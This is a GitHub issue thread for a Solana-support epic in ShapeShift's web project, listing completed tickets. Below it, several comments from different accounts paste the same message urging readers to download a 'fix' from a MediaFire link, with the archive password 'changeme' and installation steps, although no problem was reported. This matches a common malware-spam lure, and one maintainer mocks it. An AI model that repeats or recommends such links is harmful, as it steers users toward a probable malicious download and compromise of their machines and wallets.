### ISSUE TITLE
[EPIC] Solana Support

### ISSUE THREAD

**Issue by 0xean** [shapeshift/web#7621]
Support one wallet → support view balance → support TX history → support send receive → support swaps (jupiter) →  support bridging to and from SOL (debridge or the like) 

Tickets:
- [x] https://github.com/shapeshift/web/issues/7565
- [x] https://github.com/shapeshift/hdwallet/issues/675
- [x] https://github.com/shapeshift/web/issues/7622
- [x] https://github.com/shapeshift/web/issues/7737
- [x] https://github.com/shapeshift/web/issues/7738
- [x] https://github.com/shapeshift/web/issues/7739
- [x] https://github.com/shapeshift/unchained/issues/1033
- [x] https://github.com/shapeshift/unchained/issues/1031
- [x] https://github.com/shapeshift/unchained/issues/1040
- [x] https://github.com/shapeshift/unchained/issues/1041
- [x] https://github.com/shapeshift/unchained/issues/1042
- [x] https://github.com/shapeshift/unchained/issues/1038
- [x] https://github.com/shapeshift/unchained/issues/1043

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by twblack88** [comment]
> to fix your trouble try download this fix, i see it in another issue,
our trouble is you it seems.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
